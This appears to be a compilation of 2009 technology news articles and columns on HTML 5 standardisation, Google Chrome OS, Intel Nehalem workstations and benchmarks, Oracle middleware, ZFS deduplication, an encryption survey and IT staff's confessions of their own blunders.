Mozilla's Brendan Eich and Opera's Ian Hickson were displeased with how things went. "The best way to help the Web is to incrementally improve the existing web standards," concluded Eich, founder of the JavaScript Web programming language, after the meeting in a blog post.

Eich also announced there an Opera and Mozilla plan to take that evolutionary route. They launched an open e-mail list called WHATWG, short for Web Hypertext Application Technology Working Group. Apple, which offers its own Safari browser, soon began participating, too.

"It became a de facto standards organization without the formality of W3C. It's where we went to figure out what the future of the Web was," Ranganathan said.

Eventually, the Web-application direction won over the W3C. "Some things are clearer with hindsight of several years. It is necessary to evolve HTML incrementally," said Web founder and W3C Director Tim Berners-Lee said in 2006.

But Berners-Lee at the time also maintained the commitment to the "well-formed," more rigorous XML-based future: "It is important to maintain HTML incrementally, as well as continuing a transition to well-formed world, and developing more power in that world."

In practice, the W3C world and WHATWG world involve many of the same people. That probably eased the reconciliation to the current state, where WHATWG and W3C operate simultaneously, the first more informal and the second with more careful handling of intellectual property concerns.

Ultimately, HTML carried the day. What began with interest in more sophisticated Web sites such as eBay blossomed with the arrival of Ajax, which used JavaScript to build more sophisticated Web-based applications. And Web applications weren't just theoretical ideas.

"When Gmail and Google Maps and Ajax came along, it became really clear we needed a new set of technologies that made it easier to make those kinds of applications," Smith said.

The transition culminated with W3C's bare-bones news last week: "Today the director announces that when the XHTML 2 Working Group charter expires as scheduled at the end of 2009, the charter will not be renewed. By doing so, and by increasing resources in the HTML Working Group, W3C hopes to accelerate the progress of HTML 5 and clarify W3C's position regarding the future of HTML."

Some features of XHTML 2 will be built into HTML 5, so the XHTML 2 work won't have been for naught, assuming a critical mass of browser makers do in fact include the necessary XML parser along the HTML parser.

HTML 5: no walk in the park
Though the W3C-WHATWG dust has mostly settled, the standard is far from finished, and indeed looks a long way off.

The present approach involves a give and take between browser makers trying out new features and the standards group codifying them. Features can't make it to the ultimate W3C state, "final recommendation," until at least two browsers support the feature compatibly, Smith said.

In practice, that means adventurous Web developers who choose to support the new technologies in effect are blessing them even though the technology might well change.

HTML 5 elements came from all over. Canvas, which involves two-dimensional graphics, began at Apple's Safari and now has won over Opera, Firefox, and Google's Chrome. ContentEditable, which lets Web pages be edited in place, came from Microsoft. Google now is working on a faster communication feature called Web Sockets. Programmers for WebKit, the open-source project underlying Safari, are developing DataGrid, which brings spreadsheet-like tables with sorting and editing to Web pages.

"The speed of the web is continuing to pick up in general," Barzdukas said. HTML 5 feature support figures prominently in the browser sales pitches from Google and from Mozilla, with its "upgrade the Web" tag line for Firefox 3.5.

Actual standardization, though, remains distant. Mozilla's Ranganathan hopes for drafts of some HTML 5 elements this year and a draft of the full specification in 2010.

The HTML 5 built-in video situation is illustrative. Hickson, the HTML 5 editor and now Google employee, posted a lament about HTML 5 video last week because browser makers don't agree on whether to support the patent-free Ogg Theora format, preferred by Opera and Mozilla, or the commercially popular H.264 format, preferred by Google and Apple. The upshot for now: HTML 5 is trying to standardize video but doesn't specify which format to be used.

That pace of HTML 5 standardization important, given the importance Microsoft places on supporting actual standards and the company's commanding market share.

"The support of ratified standards (that Web developers) can use is something that we are extremely supportive of," Barzdukas said. "In some cases, it can be premature to start claiming support for standards that are not yet in fact standards."

by Ted Dziuba

Fail and Googasm Google has announced the Google Chrome Operating System, which is the Chrome browser bundled with a Linux kernel and a handful of hardware drivers, targeted at netbooks. Yes, this time it's actually an operating system, but don't cream yourself. Yet again, there is a severe case of the media not knowing what the fuck it's talking about.

When Google Chrome was released last year, pundits completely lost their shit over it, claiming that Chrome was a new web operating system. Meanwhile, I pointed out that in fact it's a web browser and that an operating system is a very complicated piece of software that can't really be written off as "implementation details." Now, I guess Chrome is going to be even more operating-systemy, by way of including, uh, an operating system. Journalistic logic rocks.

The pundits are losing their shit all over again, which is fairly impressive, because multiple Googasms from a single product are very rare. Last year, I highlighted the glorious incompetence of writers who fancy themselves tech journalists. Much in the way that everybody who saw Sideways is now an expert on wine, the tragedy of blogging is that anybody with a laptop and a Gmail account is an expert on technology. So now that Chrome will actually be a full-fledged operating system, let's see what the experts have to say.

The canonical example of failure in tech journalism is TechCrunch, a blog that once declared Google's MapReduce to be a system that "reduced the links found on the web into a map that search algorithms could run over." Yes, this will do nicely. TechCrunch embodies all that is wrong with blogging as journalism: shoddy fact checking, writing that would fail a high school English class, and a pre-adolescent in-the-brain-out-the-mouth reporting style.

TechCrunch, um, editor Michael Arrington quotes my previous El Reg article about Chrome not being an operating system and goes on to explain:

Purists complained that a browser isn't actually an operating system, and brought up mundane issues about hardware drivers, memory, and processor management and other red herrings. Sure, they were right - the Chrome browser isn't an operating system...

Google just bolted a big ol' bag of drivers (also known as the Linux kernel) to Chrome and are calling it the Google Chrome Operating System. It's going to be hard for people to continue to deny its operating systemness now.

Proof that you can lead a horse to water, but you can't punch him in the dick without being brought up on assault and battery charges. I'm sure that Linus is pleased to see that his decades of research into operating systems amounts to nothing more than a big ol' bag of drivers for getting people to Twitter faster.

When Chrome was first released, journalists loved the idea that Google was taking on Microsoft, but it just wasn't so. Now that Google will be releasing an operating system, the Goliath vs. Goliath story gets a little clearer. Yes, Chrome OS will be competing with Windows in the netbook market, which is the a tiny sliver of the PC market. No, Chrome will not replace Windows in the years to come. Let's all just calm down.

TechCrunch goes on to report: "Don't worry about those desktop apps you think you need. Office? Meh. You've got Zoho and Google Apps. You won't miss Office."

Ah, yes. Corporate IT workers everywhere have to port decades of esoteric business logic codified into Excel macros to Google Spreadsheets, but the real problem is, what are they going to do after lunch? Have you ever tried to use Google Docs for any serious task? In the words of a true hacker, it's like trying to build a bookcase out of mashed potatoes. The Microsoft Office institution will not easily be overthrown by a bunch of jokers writing JavaScript.

But it's not just Office that will keep Microsoft's hold on the PC market. Can you replace Active Directory with a web app? Is there a site I can visit to connect to my office's shared printer? What do you mean World of Warcraft doesn't run in the browser? How do I play a DVD in Google Chrome?

Keep whackin' away on that Pareto Principle and let us all know how it turns out. In the meantime, I'm going to go play a few rounds of Counterstrike on my Windows-based PC, because the best that my browser can do is Tetris. I'm sure that HTML5 will bridge that gap any day now.

The notion that Google Chrome OS is going to take any serious market share away from Windows is a product of the pathological Silicon Valley attitude that newer is always better, even if nothing has changed. In terms of functionality, web apps have been a regression from their desktop counterparts. Run business apps over a faulty network instead of from your hard disk? What could possibly go wrong? Can I buy an extended warranty with that?

As Mike Arrington says: "The Internet Is Everything. All the OS has to do is boot the damn computer, get me to a browser as fast as possible and then stay the hell out of the way."

Indeed. That's probably why desktop Linux machines with Firefox have already taken such a foothold in the consumer market.

Oh, wait. ®

by Andrew Binstock

Last May, InfoWorld presented a comparative roundup of workstations built on the then-new quad-core processors. In that review, I examined an entry-level machine, two midranges, and a high-end system. While impressed by their muscle, I still felt the need to explain how those workstations were a category separate from high-end desktop systems. The Nehalem workstations I examine this year, however, require no such explanation. They move the flag forward so far that few people would consider purchasing them for standard business applications, where a good desktop or laptop would be sufficient.

In this review, I evaluate three entry-level systems (one each from Dell, HP, and Lenovo) and two midrange to high-end systems (from HP and Dell). In an ideal world, it would have been fun to allow the vendors to send their biggest, fastest system and throw those up against each other to see what shakes out. However, top-end workstations today can hold 192GB of RAM, which alone can push system costs into the multiple tens of thousands of dollars. So we settled for high-end workstations under $9,000. This left unexplored only the super-high-end market, which is dominated by specialty applications and narrow industry niches.

Why Nehalem matters
Intel's Nehalem processors represent a truly new generation in the storied x86 processor history. Their release adds so many new features to the processor family that it appears almost unrecognizable. The key new elements are a built-in memory controller on each chip and high-speed interconnect between processors and peripherals. The interconnect, called QPI (QuickPath Interconnect), replaces the long-maligned FSB (front-side bus) that Intel chips were known for, while providing a superset of its functionality. QPI and on-chip memory controllers are both ideas initially implemented for x86 chips by AMD. In this first release, Intel has clearly refined the implementation. The result of both technologies is consistently greater levels of memory transfer than could be attained previously. (As shown in the accompanying benchmark table, the slowest system we review here has memory bandwidth that's twice that of the fastest system a year ago – even though memory latency has decreased by only around 20 percent.)

In addition to these advances, Nehalem sports two important changes. First, the cache architecture has been moved to a three-tier system from the previous two tiers. The outermost, Level 3 (L3) cache is a stout 8MB shared by all four cores. When fewer cores are busy, the remaining cores get access to more of the cache. Each core can actually run two threads at once. This SMT (simultaneous multithreading) is a redux of Intel's earlier Hyper-Threading technology, although it scales better on Nehalem than in its original implementation. Hyper-Threading means that eight threads can run at once on a single processor – that's a lot of instructions in flight at any given moment.

The second important change to note is a Turbo mode that kicks in automatically when some cores are unused or underused. Their resources, including power, are contributed to the work of busy cores and can accelerate their performance by 5 to 10 percent, depending on the processor.

Given these numerous improvements, it's no wonder that Intel and its OEM partners promise a massive performance boost over the previous generation of Xeon processors.

by Tom Krazit

Apparently, organizing the world's information and making it universally accessible and useful will require a new operating system.

Google has long worked on expanding its reach beyond mere Internet search. And as many had suspected, it confirmed late Tuesday night that it plans to develop a lightweight operating system based on Linux and Web standards for personal computers.

Why? Well, Google's standard response to any question about why it's working on something other than search is to declare that any product that helps people get on the Web, and enjoy their experience on the Web, benefits Google's advertising customers in that more Web users equals more Google searches.

Yet, Chrome OS represents something more. There's a competitive impact that can't be ignored, no matter how often Google insists that it's in this world to do good rather than inflict pain on other corporations.

Few details were available Wednesday concerning one of the most important and ambitious projects Google has ever undertaken. Sources familiar with the Chrome OS project say Google engineers have only been working on the project in earnest since the beginning of the year, so there's likely a lot that still needs to be ironed out.

Chrome OS is the byproduct of Google thinking it can do better than Windows, Mac OS X, the various flavors of Linux, and even its own Android operating system. It's long been obvious that the world has changed from a personal computing model built for individuals working offline or businesspeople sharing files across a workplace to one where the consumer/business lines have blurred and people are expected to be online anywhere and everywhere.

Accompanying that shift has been the decreasing importance of processing power and operating system complexity. For years, the dirty secret of the computer industry has been that most people don't use nearly the amount of headroom provided to them by modern microprocessors and operating systems.

After all, if you're searching the Web, sending e-mail, typing up documents, touching up photos, and updating your Facebook status-hardly an uncommon usage model-you're more concerned with speed and battery life than raw power. Those still playing Doom or editing video will always need something more robust, but most people do spend an awful lot of time in the browser and have embraced smartphones and Netbooks as a way of staying online on the go.

Google's general idea seems to be twofold. First, it wants to make it easier for regular people to use a computer by making an operating system that is fast, secure, and lightweight enough to run on portable devices.

Sources familiar with Google's plans for the Chrome OS said that the company is working on a new method of "windowing," or switching between multiple applications. Google also believes that the whole idea of storing your files and applications in folders is an archaic way of organizing your data, and plans to unveil a new user interface that handles things a little differently.

Secondly, Google believes that through the use of Web standards like HTML 5-promoted heavily during its recent Google I/O conference as the development platform of the future-software development on a browser-based OS will be easily understood by developers reared in the Web 2.0 era.

This is not a new idea. Palm is betting its future on such a strategy, having introduced WebOS on the Palm Pre as a Web-friendly development environment based on a browser engine running atop Linux. Sound familiar?

Google brings much more to bear than Palm, however. It has an entire suite of Web applications and services that already form much of what you want a computer to do: send e-mail, compose documents, edit photos, and, of course, browse the Web.

But why does Google think it needs two operating systems to address this evolving usage model? Much of the language used to introduce Chrome OS could have been pulled from a blog post two years ago introducing Android, Google's lightweight Linux-based open-source smartphone operating system.

Just a few months ago Google's Andy Rubin declared Android to be "a revolution" that would help Google conquer the write-once, run-anywhere goal that has eluded the non-Microsoft software community for so many years. And Google executives have endorsed the concept of other companies building things other than phones based on Android.

However, Android appears to now occupy a different role in Google's thinking. According to Tuesday night's blog post, "Android was designed from the beginning to work across a variety of devices from phones to set-top boxes to netbooks. Google Chrome OS is being created for people who spend most of their time on the web, and is being designed to power computers ranging from small netbooks to full-size desktop systems."

As noted, there are an awful lot of details that still need to surface before we can glean Google's true intent with Chrome OS, not to mention the potential impact. Google said it plans to release the code for Chrome OS later this year, with the expectation that devices based on the OS could arrive in the second half of 2010.

But one thing is for sure: Google's ambitions are boundless. The company is proposing to do nothing less than rewrite the rules that govern personal computing.

by Chris Mellor

Sun customers downloading the latest version of Java will get a free 30-day trial of Carbonite Online Backup.

Carbonite reckons this will get it access to millions of Java users.

Carbonite Online Backup installs in a few clicks and runs automatically in the background, continually backing up the files on the computer, sending them in encrypted form to Carbonite's Boston and Beijing data centres. It says storage capacity is unlimited and users will never outgrow their Carbonite subscription no matter how much data they have.

Carbonite is working to get access to defined groups of users and has trial use agreements with Lenovo for its consumer PCS, Acer and La Cie. However LaCie is starting up its own cloud backup service and its Carbonite deal may come unstuck.

Carbonite has distribution agreements with a small, Ohio-based cable TV company. Masillon, and a few ISPs, such as Arcor in Germany and BBSoft in Japan. This Java deal is on a different level as it gives it access to many millions of Java downloaders.

So far Carbonite has not managed to do deals with retail outlets, or has avoided them. This contrasts with Spare Backup which has just announced an expansion of one of its three UK retail deals. Although it has OEM deals, such as the one with Sony and its Vaiao, the retail deals seem to be boosting Spare Backup revenues a lot.

In March, Spare Backup CEO Cery Perle said this about the first quarter results: "Our subscription numbers continue to improve ... We have benefitted from the combination of strong customer retention, as well as strong growth in new customers through the DSGi channel. We believe that the upcoming Cydcor and Curry's launches will only accelerate this rate of sales growth..."

Spare Backup gets exposure to thousands of customers through hundreds of stores. These are people buying notebook or desktop computers. Although Carbonite has access, probably, to many more users they will be existing users, not new ones with a sales rep possibly selling the Spare Backup service. Access to retail customers could be worth more, in subscription terms, than to SW download customers who might be irritated by a longer download process.

The consumer focus of both Carbonite and Spare Backup contrasts with the enterprise customer focus of Nirvanix which has just gained US SAS 70 (Type II) to solidify its enterprise service provider credentials. ®

by Paul Krill

For developers, Oracle's Fusion Middleware 11g rollout on Wednesday emphasizes Java technologies, particularly the company's JDeveloper IDE, along with concepts, including declarative programming and ALM (application lifecycle management).

Oracle's emphasis on Java should come as further relief to Java developers, with Oracle already in the process of buying Java founder Sun Microsystems and offering reassurance to these developers at the recent JavaOne conference. The Fusion announcement featured a multifaceted suite of technologies for business IT needs, ranging from SOA deployments to cloud computing, business process transformation, and IT governance.

JDeveloper, Oracle said in one of its statements on the rollout, lets developers build applications and services across application servers; Oracle's WebLogic Java application server acquired from BEA Systems is a key part of the company's middleware line. Developers also can leverage the open source Eclipse IDE through Oracle Enterprise Pack for Eclipse, Oracle said.

"In the developer tools space, I think we're really excited with what we've done," said Ted Farrell, chief architect and senior vice president of tools and middleware at Oracle. The unveiling gets Oracle fully into the ALM space and desktop integration, he said.

As part of Wednesday's announcement, Oracle is offering an upgrade to JDeveloper, identified as version 11.1.1.1, as well an ALM technology called Team Productivity Center. "Its goal is to bring teams together inside the IDE," Farrell said.

The ALM software lets teams track bugs together and share code, he said. "You can chat with each other right from inside the IDE," said Farrell. Developers can work with third-party technologies such as the Subversion version controly systems.

All Fusion middleware products plug into JDeveloper. Asked what Oracle's emphasis on JDeveloper and Eclipse means for the Sun-dominated NetBeans IDE, Farrell said he could not comment on what Oracle might do with it. But he did call NetBeans "a viable IDE in the market today."

Oracle is leveraging its ADF (Application Development Framework) and ADF Faces, Farrell said. "Basically, what we're saying is we're trying to abstract our users building enterprise applications and Web applications from the underlying view technologies, which are constantly changing," Farrell said.

While Microsoft tells developers to build using Silverlight, Adobe stresses Flex development, and others hail "Open Web" technologies, such as JavaScript and DHTML, Oracle emphasizes abstraction, leveraging JavaServer Faces (JSF) as a component model, said Farrell. JSF is geared toward a traditional Model View Controller architecture, he said.

Google's framework is most similar to Oracle, using Java as its native language, said Farrell. With JSF, Oracle is going "the declarative route," providing an abstraction layer, he said.

Observers offered varying perspectives on Oracle's moves, with one analyst making a comparison to Microsoft's Oslo software modeling platform.

by Matt Asay

Despite the occasional usability snag, one of the very best things about open source is the diversity of development "itches" that can be "scratched," to use Eric Raymond's parlance. This is borne out in the news that the popular Mozilla Firefox browser has been ported to the Mac OS 9 platform.

Dubbed "Classilla," it's an effort to keep Apple's classic OS 9 alive and kicking by bringing the power of modern browser technology to an old operating system.

According to the project developers, however, it also "establishes a template for other free open-source projects to follow," namely "By putting the ability to maintain our own software in our own hands, as users of classic Macs, we ensure that OS 9 will continue to survive."

In other words, Classilla demonstrates what open-source software has long allowed: developers and users can take their fates into their own hands, rather than being overly reliant on a vendor.

So, if you're feeling ambitious, join the effort. Or you could instead contribute to the Firefox port for the Amiga (Amizilla). You have nothing to lose but your chains (and quite possibly your sanity).

by Chris Mellor

Oracle/Sun's ZFS file system seems set to get deduplication added to it later this year.

ZFS or the Zettabyte File System is a 128-bit file system that Sun says radically simplifies file system administration. Amongst its features are 64-bit checksums that detect and correct silent data corruption. In other words, it is already looking at data blocks inside the file system and checking their integrity. This could be extended to look for duplicated blocks or groups of blocks.

A thread on the OpenSolaris.org website mentions ZFS deduplication. Responses indicate that a synchronous version is being developed, one that works as data comes in. A background or asynchronous mode is also mentioned.

Later this month there will be a Kernel Conference in Brisbane, Australia, running from July 15 to July 17. The agenda includes a "Deduplication in ZFS" opening keynote, presented by Jeff Bonwick and Bill Moore. Jeff Bonwick is a Sun Fellow and VP, and the chief architect of ZFS. Bill Moore is a Distinguished Engineer at Sun and co-led with Jeff Bonwick on ZFS.

That seems pretty solid. ®

by Alex Goldman

The fourth annual U.S. Encryption Trends Study was released today by The Ponemon Institute. The study says that 85 percent of surveyed businesses have experienced a data breach in the past year, up from 60 percent in the 2008 study. The report was sponsored by encryption supplier PGP Corp.

"A data breach is defined as the loss or theft of confidential or sensitive data including information about people and households," said Dr. Larry Ponemon, chairman and founder of The Ponemon Institute, in an e-mail to InternetNews.com.

The numbers are comparable to a similar study released last week concerning UK businesses. There, the Ponemon Institute found that 70 percent had been breached in the last year.

The report was based on surveys with nearly a thousand (997) U.S.-based executives.

Organizations need to have a holistic data encryption strategy, according to the report.

"For the second year in a row, organizations with no encryption strategy accounted for all the organizations that suffered five or more data breaches (13 percent)," the report said.

Organizations are adopting encryption to comply with industry regulations and state and federal laws, the report explained.
A flood of data breaches

The news comes as reporting requirements are becoming more burdensome. For example, a recent change to reporting requirements for healthcare organizations in California has resulted in a flood of data breach reports there.

Businesses can expect closer scrutiny of security issues – and failures – as the government ponders new privacy laws.

The report touts the platform approach to encryption. The use of "encryption applications managed via a platform continues to be a best practice approach to an overall data protection strategy in 2009," said Dr. Ponemon in a statement.

Also today, PGP Corporation released two new products. PGP Portable is designed to help encrypt removable storage devices, while PGP Mobile helps organizations encrypt data on mobile devices. Pricing for the new products was not disclosed.

According to the report, organizations see a need to protect mobile devices. "More than 59 percent of respondents say it is very important or important to encrypt employees' mobile devices – a sign that organizations recognize that valuable data is more mobile than ever," the report said

Companies are right to be concerned about breaches, the report said, referring to an earlier study by The Ponemon Institute that found that breaches cost businesses, on average, $202 per record and, in total, an average of $6.6 million.

by Dan Tynan

It's one of the unwritten laws of physics: At some time or another, everybody screws up.

But when IT pros make mistakes, they don't mess around. Entire buildings go dark. Web sites disappear. Companies grind to a halt. Because if you're going to mess up, you might as well make it count.

"I always tell my guys, hey, you're gonna do stupid stuff," says Rich Casselberry, director of IT operations at Enterasys , a networking systems vendor. "It's OK to do something stupid if you have the wrong information. But if you do something stupid because you're stupid, that's a problem. The trick is to not flip out, which only makes it worse, or try to hide it. You need to figure out how to keep it from happening again."

We've gathered up some of the more egregious examples from IT pros brave enough to share their screwups with us. Backups gone bad, people with admin privileges who probably shouldn't, what can go south when you unplug the wrong equipment – in some cases, we've obscured their identities to spare them embarrassment; other geeks, however, are perfectly willing to own up to their youthful mistakes.

Sure, some of these mishaps are amusing in retrospect. But don't laugh too hard. We know you've probably done worse.

True IT confession No. 1: The case of the mysterious invisible backup
Our first tale of misadventure involves a longtime IT pro who doesn't want his real name used, so we'll just call him Hard Luck Harry.

Harry had his share of mishaps when he started out a decade ago at a major networking equipment maker in the Northeast. There was the time he changed an environmental variable that broke everything on his company's financial apps, earning an e-mail from his boss ordering him to "never hack on this system again." Or the time he crashed the company's core ERP system by overwriting /dev/tty. Harry says after he accidentally ripped the company's T1 lines out of the wall with his pager, he was banned from ever reentering the telecom closet.

But the worst one happened after Harry installed an Emerald tape backup system. Did he bother to read the manual? Please. This was child's play. Just load install.exe and let the software do its thing.

It seemed to work perfectly. Four hours later, the first backup completed and everything looked fine.

Fast-forward six months. Harry gets a call late one night at home from one of his work pals. That night's backup tape is completely blank, the friend tells him. Worse, the last four weeks of backups are also blank.

As Harry soon discovered, that particular backup program installs in demo mode by default. Demo mode looked exactly like real mode and even took the same amount of time as an actual backup, but nothing ever got written to tape – a fact that was noted in the manual, which Harry might have seen had he read it.

Fortunately, the company used ADP for payroll processing. ADP shipped back historical payroll records, so the firm lost only a week's worth of data. The bad news? Harry was up until 3 a.m. manually stuffing payroll envelopes, along with his boss, the VP of finance, the entire payroll department, and the company's brand-new CIO, whom he met for the first time that night.

"I got to say, I was pretty popular," he jokes. "I think the only reason they didn't fire me was by that point they had gotten so used to me screwing up, they realized I couldn't do anything right."

Lessons learned? 1. Test the restores, not the backups, says Harry. "No one cares if the backup works; they care if the restore does." 2. Think before you type. 3. Remove your pager (or BlackBerry) before entering the telecom closet, just to be safe.

True IT confession No. 2: Sometimes it takes a janitor to clean up an IT mess
Late one night in 1997, Josh Stephens was working all alone at his console at a large Midwestern telecom company. Stephens was making changes to the Cisco Catalyst switches at the telco's main customer call center, which was located several states away. That's when the spanning tree protocols hit the fan.

"I'm still not sure exactly how I did it, but I caused some sort of broadcast storm and STP freak-out that locked up not only the switch I was working on but every single switch in that facility," he says. That broadcast storm brought down hundreds of call center users, stranding many of them in the middle of customer calls.

Worse, the switches were "locked hard," requiring a physical power-off and a slow methodical plan to bring them back online, one at a time. The datacenter was hundreds of miles away and had no on-site IT staff, so Stephens did the next best thing: He called maintenance.

"I ended up finding a janitor that had keys to all of my LAN closets and I talked him through (a) which devices were the Catalyst switches, and (b) how to power them off," he says. "I also promised him he wouldn't get fired for helping me."

Though the call center was down for more than hour, nobody ever found out why or who was behind the glitch, says Stephens, who is now VP of technology and Head Geek (yes, that's the actual title) for SolarWinds , a maker of network management software.

Lessons learned? 1. Don't make changes without scheduling a window for them, even if the changes seem minor, says Stephens. 2. Never conduct a change control event without IT resources near the gear you're changing. 3. Be nice to the janitors. One day they might save your assets.

True IT confession No. 3: Put your hands up and step away from the terminal
One of the unavoidable facts of tech life is that when managers are given administrative rights to complex systems, bad things tend to happen.

Back in the late '80s, Johanna Rothman was director of development for a small, distributed process systems maker in the Boston area. Company management insisted on mandatory overtime for everyone, Rothman included. After three months of this, Rothman and her team were cranky and exhausted – a recipe for disaster.

"One night at 9 p.m., I realize we have a bunch of files to be deleted," she says. "I'm on a Unix system, and the system won't let me delete them - I'm not root. Well, I'm the Director. I have the root password. I log in as root. I start rm -r - the recursive delete - from the directory I know is the right directory. I know this."

After a few minutes, the rm command stops working. Rothman, still busy deleting all the applications, kills the job, calls the IT manager, and explains what she's done.

"He says, 'Move away from the keyboard. I'm coming in to start the restore.' I say, 'I can help. Where are the tapes?' He says, 'Go away. Just leave. I don't need more of your help.'"

The restore takes two days. Rothman says she slept in late on both days and told everyone else on her team to do the same. She also left voicemail apologies to all the developers.

"I think the only reason I didn't get fired is because management was too busy with the crisis to realize what a mess I'd made," says Rothman, who now runs her own IT consulting group and keeps a safe distance from Unix root directories.

Lesson learned? 1. There is no reason for anyone higher than the level of manager to have the root password, says Rothman. 2. Too much overtime makes people tired and stupid. The more tired they are, the stupider they get.

True IT confession No. 4: What can Brown do for you?
Here's one of those rare backup mishaps in which data did in fact get backed up. But what it got backed up to is where things goes sour.

Twenty-seven years ago, David Guggenheim had just gotten his first "real job" as biological data manager at an environmental consulting firm in Southern California. At that time, the firm's hardware consisted of a PDP-11 and a time-share IBM 360 mainframe in Los Angeles, accessed via dial-up.

"It was time to archive an important project from the IBM mainframe, so I cracked my knuckles and began pounding out the JCL [Job Control Language] necessary to write our data to tapes that would then be shipped to our office," he says. "I submitted the job, satisfied that our data would be safely backed up."

A few days later a UPS driver poked his head in the door at the firm's office and shouted, "Is there a David Guggenheim here?"

The UPS truck was filled floor to ceiling with boxes, all of them addressed to Guggenheim. He opened the first one. It was full of punch cards. And so were all the rest of them.

"It was our data from the IBM mainframe," he says. "To my horror, I realized that instead of specifying output to magnetic tape, I specified output to punch cards. I can't remember my JCL very well any more, but as I recall, it was the difference between specifying '=0' versus '=1.' I was absolutely humiliated."

It gets worse. A few days after the entire staff got involved clearing enough floor space for the mountain of boxes, the bill arrived. The cost of a punch-card backup job was nearly $1,000 (and remember, we're talking about 1982 dollars here).

"I had blown our budget out of the water, killed a forest, and still failed to back up our data onto tape," says Guggenheim, who's now Dr. David Guggenheim, Ph.D., president of 1planet 1ocean, and a senior fellow at The Ocean Foundation. "I've spent my career since then doing environmental work, so hopefully I paid penance for the dead trees."

Lessons learned? 1. Little mistakes can cause huge problems, so keep checking until it hurts. 2. Immediately own up to your errors; humility is a great teacher. 3. Take the time to appreciate the humor of a colossal screw-up, says Guggenheim. "It does wonders for the sting."

True IT confession No. 5: Unplug at your own risk
Back in the mid-'90s, Jan Aleman was interim IT manager for a major telecom company in the Netherlands. He was called in to replace a CTO who'd left under less-than-voluntary circumstances. Before the ex-CTO got canned, though, he'd ordered a $300,000 IBM failover system for the company's mission-critical billing engine.

"A very good IBM salesman had sold them this overpriced hardware, assuring them that if the primary system failed it would rollover seamlessly to the secondary one," says Aleman. "He said it was completely redundant, that nothing could go wrong. I said, 'All right, let's see if it actually works.'"

So Aleman yanked the power plug for the primary system out of the wall, right in front of the IBM salesman. All the company's core systems went dark. The critical billing engine was down for the rest of the afternoon. The phone switches still worked, but nobody in the back office could get anything done.

Though the failover system was installed and running, nobody had bothered to test it. So the next thing Aleman did was institute biweekly tests of the system on weekends.

"I unplugged the company," says Aleman, who is now CEO of Servoy , a developer of hybrid (SaaS and on-premises) software . "Needless to say, they were not very happy, but nothing bad ever happened to me. I'm still not sure how I managed to pull that off."

Lessons learned? 1. Always test systems before you bet the company on them (repeat as needed). 2. Think twice before you yank that power cord.

True IT confession No. 6: Never let another be the master of your domains
Back around 2003 or so, "Fred" (not his real name) was the IT manager for a regional cable company in the Midwest. At the time, the company had about 35,000 subscribers. To boost its business services, it decided to become a domain name reseller for Network Solutions.

As part of the transition to domain name sales, the company redirected all domain renewal notifications to a person in its business support unit. "We assumed only our customer's domain notifications would go there, and not the company's own domains," Fred says. But as the saying goes, assuming makes asses out of everyone.

Sure enough, one night around 10 p.m. everything at the ISP stopped working: DNS, e-mail, the company's own Web sites, and the sites it hosted for its business customers – all simply went poof.

The problem? The ISP had neglected to renew its own domains. The person in business support assumed Fred was also getting notified about the renewals (he wasn't) and Fred assumed that since he wasn't being notified, everything was hunky dory (it wasn't).

"By the time we diagnosed the problem – because you rarely think to check whether your own domain has expired – we had fallen out of the root servers and it took a full 24 hours before everything was restored," says Fred. He adds a variant on the old MasterCard commercials:

1) Domain renewal: $9.99
2) Late-night tech support call: $0.00
3) Breaking Internet connectivity and e-mail for 35,000 people in your hometown: Priceless.

Lessons learned? 1. Always have multiple people receiving import alerts. 2. Register your domains for 10 years and it will most likely be the next guy's problem.

True IT confession No. 7: Don't ask, don't tell, and don't let them make you take a polygraph
Four years ago "Paul" (not his real name), an independent data analyst in (yes) the Midwest, was working with a governmental client on a $20,000 analysis project. After two months of hard work, he delivered a preliminary draft to the client, then went off on a week-long business trip.

Before he left, Paul burned a disc with all the project data on it so that he could finish it up in the hotel during his trip. And as was his usual custom at the time, he deleted all 4GB of project data from his hard drive to free up space.

Then, of course, he lost the disc: $20,000 worth of work gone in a flash. What did he do? What any smart consultant would do: He billed the client for the entire project, in full. And promptly received a check.

"Six months went by and I didn't hear back from the client," says Paul. "I thought that was incredible, because I expected to receive comments and changes on the draft. A year went by, and nothing."

Finally, two years after delivering the draft, the dreaded call finally came.

"'Are you going to ever finish this project?' I heard on the other end of the phone," says Paul. "I said, 'There's no way that I can stand by that original data and recommendations, since two years have gone by. None of the information is valid anymore.' Of course, I knew full well I could never provide any updated data or updated recommendations based on the original data. Fortunately, the client accepted that explanation and then proceeded to discuss what fees I'd need for some new work."

In his defense, Paul says the preliminary draft was 95 percent complete, and the client told him they'd already implemented many of the recommendations he'd made.

These days, Paul is a self-proclaimed "data backup nut."

"On any given day I have about 10 copies of all current project data, and can completely restore every project data file that I have worked on during the last three years within about five minutes," he says. "I learned a hard lesson that I certainly won't forget anytime soon."

Lessons learned? 1. You can never have enough backups. 2. It's a good idea to also keep hard copies on hand, just in case. 3. If you do lose all your data before you've delivered the final product, try to make sure you're working for the government at the time. They might never notice.

by Timothy Prickett Morgan

Intel's Nehalem EP chip has significantly out-peformed AMD's Istanbul on a set a memory-intensive benchmark tests.

The techies at supercomputer cluster maker Advanced Clustering Technologies are at it again, running their own benchmarks on single server nodes using popular high-performance computing tests normally used on entire clusters. This time around, ACT is putting the latest x64 chips into two-socket systems and running the Stream memory benchmark on the boxes.

By running various HPC tests on single servers, ACT is helping educate customers on the pros and cons of the new Intel quad-core 'Nehalem EP' Xeon 5500 and Advanced Micro Devices six-core 'Istanbul' Opteron 2400 processors.

A few weeks ago (http://www.theregister.co.uk/2009/06/25/act_super_duke_out/), ACT cluster engineer Shane Corder published a report (http://www.advancedclustering.com/company-blog/high-performance-linpack-on-xeon-5500-v-opteron-2400.html) after he slapped the Linpack Fortran benchmark test on two-socket servers using these new chips.

On that test, one of ACT's Pinnacle rack servers equipped with two quad-core 2.66 GHz Xeon X5550s with 12 GB of DDR3 main memory running at 1.33 GHz was able to deliver 74.03 gigaflops of sustained performance against a peak theoretical performance of 85.12 gigaflops. But a Pinnacle machine configured with two of the six-core Opteron 2435 processors running at 2.6 GHz and 16 GB of DDR2 main memory running at 800 MHz was able to deliver 99.38 gigaflops (against a peak theoretical performance of 124.8 gigaflops).

So, AMD won that one - especially when you consider that the Opteron-based Pinnacle HPC node from ACT cost $3,500 compared to the $3,800 price on the Xeon-based Pinnacle box.

Now, with the Stream benchmark, the test is not about flops so much as memory bandwidth, and given the higher clock speed of the DDR3 main memory compared to DDR2 memory, you'd expect the Nehalem EP server node to do better than it did on the Linpack test. And indeed it did.

